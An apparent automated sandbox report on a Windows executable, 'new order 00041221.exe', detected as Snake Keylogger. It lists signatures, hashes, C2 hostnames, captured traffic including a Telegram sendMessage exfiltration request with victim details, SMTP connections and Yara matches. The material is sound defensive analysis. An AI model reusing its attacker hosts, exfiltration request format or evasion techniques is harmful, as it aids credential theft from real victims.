Windows Analysis Report
new order 00041221.exe

Overview

General Information

Sample name: new order 00041221.exe
Analysis ID: 1482843
MD5: f0c82f395d37fa87114ca7ef075695c8
SHA1: 06df165721ef1544251108d1af927786ea7de870
SHA256: d954045a10b2292df4e754ad6f1c5350c82ce0a75d2cd9275ada797eca2c413f
Tags: exe, Payment

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: http://anotherarmy.dns.army:8081 Avira URL Cloud: Label: malware
Source: http://aborters.duckdns.org:8081 Virustotal: Detection: 11% Perma Link
Source: http://varders.kozow.com:8081 Virustotal: Detection: 14% Perma Link
Source: http://anotherarmy.dns.army:8081 Virustotal: Detection: 14% Perma Link
Source: new order 00041221.exe Virustotal: Detection: 41% Perma Link
Source: new order 00041221.exe ReversingLabs: Detection: 47%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: new order 00041221.exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: new order 00041221.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2
Source: new order 00041221.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 0127F2EDh 3_2_0127F150
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 0127F2EDh 3_2_0127F33C
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 0127FAA9h 3_2_0127F7F1
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A331E8h 3_2_05A32DC0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3F471h 3_2_05A3F1C8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A331E8h 3_2_05A32DD0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A331E8h 3_2_05A33116
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3EBC1h 3_2_05A3E918
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A32C21h 3_2_05A32970
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3F019h 3_2_05A3ED70
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3E769h 3_2_05A3E4C0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3DEB9h 3_2_05A3DC10
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3E311h 3_2_05A3E068
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_05A30040
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_05A30853
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3DA61h 3_2_05A3D7B8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A30D0Dh 3_2_05A30B30
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A31697h 3_2_05A30B30
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3D1B1h 3_2_05A3CF08
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3D609h 3_2_05A3D360
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3F8C9h 3_2_05A3F620
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_05A30673
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3FD21h 3_2_05A3FA78

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.7:49727 -> 203.124.44.4:2525
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.moonbrosurgical.com
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 26 Jul 2024 07:03:27 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.moonbrosurgical.com
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0Q
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003074000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en0
Source: new order 00041221.exe, 00000003.00000002.3711414422.000000000306F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003096000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/0
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2

System Summary

Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: new order 00041221.exe, BaseTypeRequiredAttribute.cs Large array initialization: : array initializer size 620175
Source: initial sample Static PE information: Filename: new order 00041221.exe
Source: C:\Users\user\Desktop\new order 00041221.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04C86F4C 1_2_04C86F4C
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04C83E3C 1_2_04C83E3C
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04C85858 1_2_04C85858
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04C85868 1_2_04C85868
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04C87810 1_2_04C87810
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DD65D0 1_2_04DD65D0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DDE4F4 1_2_04DDE4F4
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DD7328 1_2_04DD7328
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DF75C0 1_2_04DF75C0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DF4640 1_2_04DF4640
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DFB250 1_2_04DFB250
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DFB260 1_2_04DFB260
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DF3B60 1_2_04DF3B60
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B77240 1_2_06B77240
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B70040 1_2_06B70040
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B746B0 1_2_06B746B0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B746A2 1_2_06B746A2
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B77240 1_2_06B77240
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B72FD8 1_2_06B72FD8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B73410 1_2_06B73410
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B73400 1_2_06B73400
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B7A290 1_2_06B7A290
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B74AE8 1_2_06B74AE8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B74AD8 1_2_06B74AD8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B72BA0 1_2_06B72BA0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B72B80 1_2_06B72B80
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B70006 1_2_06B70006
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127C146 3_2_0127C146
